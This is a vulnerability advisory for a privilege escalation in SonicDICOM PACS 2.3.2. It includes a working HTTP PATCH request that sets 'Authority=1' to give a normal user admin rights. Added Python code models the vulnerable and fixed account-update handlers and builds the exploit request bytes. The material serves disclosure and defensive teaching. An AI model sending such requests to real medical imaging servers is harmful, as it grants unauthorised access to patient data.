SonicDICOM PACS 2.3.2 Remote Vertical Privilege Escalation Exploit


Vendor: JIUN Corporation
Product web page: https://www.sonicdicom.com
Affected version: 2.3.2 and 2.3.1

Summary: SonicDICOM is PACS software that combines the capabilities of
DICOM Server with web browser based DICOM Viewer.

Desc: The application suffers from a vertical privilege escalation
vulnerability. The account update endpoint (/viewer/api/accounts/update)
accepts the 'Authority' parameter from any authenticated user without
checking that the caller is allowed to change it. A normal user can
therefore elevate his/her privileges by sending an HTTP PATCH request
that sets the parameter 'Authority' to the integer value '1', gaining
admin rights.

Tested on: Microsoft-HTTPAPI/2.0


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2017-5396
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5396.php

22.11.2016

--

PATCH /viewer/api/accounts/update HTTP/1.1
Host: 172.19.0.214
Content-Length: 37
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Escalation Browser/1.0
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: {REMOVED_FOR_BREVITY}
Connection: close

Id=testingus&Name=peend&Authority=1
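The following is an added example and is not code from this advisory or from SonicDICOM. It models the server-side bug class the request above exploits (a self-service account update that mass-assigns the 'Authority' field) next to a hardened handler that authorizes from the session rather than the request body, and it builds the advisory's PATCH request with a computed Content-Length. The account store, the session table, the handler shape and the 0/1 meaning of Authority are assumptions; only the endpoint path, parameter names and the Authority=1 value come from the advisory.

```python
"""
Added example, not part of ZSL-2017-5396 or of SonicDICOM: a vulnerable
account-update handler that mass-assigns 'Authority', a hardened one that
enforces authorization server-side, and a builder for the advisory's
PATCH request. Store, sessions and handler shape are assumptions.
"""
import copy
from urllib.parse import parse_qs, urlencode

ADMIN, USER = 1, 0          # Authority: 1 = admin (per the advisory), 0 = normal user (assumed)
SELF_EDITABLE = {"Name"}    # fields a normal user may change on their own account (assumed)

# Constructed sample data, not from the advisory.
BASE_ACCOUNTS = {
    "admin":     {"Name": "Administrator", "Authority": ADMIN},
    "testingus": {"Name": "Testing User",  "Authority": USER},
}
# session cookie -> account id; stands in for the cookie the advisory redacts
SESSIONS = {"sess-testingus": "testingus", "sess-admin": "admin"}


def fresh_accounts():
    """Independent copy of the sample store so each run starts clean."""
    return copy.deepcopy(BASE_ACCOUNTS)


def parse_form(body):
    """application/x-www-form-urlencoded body -> flat dict (first value wins)."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def _coerce(field, value):
    """'Authority' is an integer server-side; everything else stays text."""
    return int(value) if field == "Authority" else value


def update_account_vulnerable(cookie, body, accounts):
    """Vulnerable: authenticates the caller, then writes every submitted
    field to the named account. Nothing checks whether the caller may set
    'Authority' or may edit that account at all (mass assignment)."""
    if cookie not in SESSIONS:
        return 401, "not authenticated"
    form = parse_form(body)
    target = accounts.get(form.get("Id", ""))
    if target is None:
        return 404, "no such account"
    for field, value in form.items():
        if field != "Id":
            target[field] = _coerce(field, value)
    return 200, "updated"


def update_account_fixed(cookie, body, accounts):
    """Hardened: what the caller may do is derived from the session, not the
    body. Admins may edit any account and any field; everyone else only
    their own account and only SELF_EDITABLE fields. The whole request is
    validated before any write, so a rejected request changes nothing."""
    caller_id = SESSIONS.get(cookie)
    if caller_id is None:
        return 401, "not authenticated"
    is_admin = accounts[caller_id]["Authority"] == ADMIN
    form = parse_form(body)
    target_id = form.get("Id", "")
    target = accounts.get(target_id)
    if target is None:
        return 404, "no such account"
    changes = {k: v for k, v in form.items() if k != "Id"}
    if not is_admin:
        if target_id != caller_id:
            return 403, "may only edit own account"
        forbidden = sorted(set(changes) - SELF_EDITABLE)
        if forbidden:
            return 403, "not permitted to change: " + ", ".join(forbidden)
    try:
        coerced = {k: _coerce(k, v) for k, v in changes.items()}
    except ValueError:
        return 400, "bad value"
    if coerced.get("Authority", USER) not in (ADMIN, USER):
        return 400, "bad Authority value"
    target.update(coerced)
    return 200, "updated"


def build_patch_request(host, cookie, account_id, name, authority):
    """Raw HTTP/1.1 PATCH request in the shape shown in the advisory;
    Content-Length is computed from the encoded body."""
    body = urlencode({"Id": account_id, "Name": name, "Authority": authority})
    headers = [
        "PATCH /viewer/api/accounts/update HTTP/1.1",
        f"Host: {host}",
        f"Content-Length: {len(body)}",
        "User-Agent: Escalation Browser/1.0",
        "Content-Type: application/x-www-form-urlencoded",
        f"Cookie: {cookie}",
        "Connection: close",
    ]
    return ("\r\n".join(headers) + "\r\n\r\n" + body).encode()
```

Feeding the advisory's body (Id=testingus&Name=peend&Authority=1) to update_account_vulnerable under the testingus session flips that account to Authority 1; the fixed handler returns 403 and leaves both Name and Authority untouched, while an admin session can still set Authority. The bytes returned by build_patch_request can be written to a socket as-is; the test server's actual response codes are not recorded in the advisory, so treat the check on the response as a manual step.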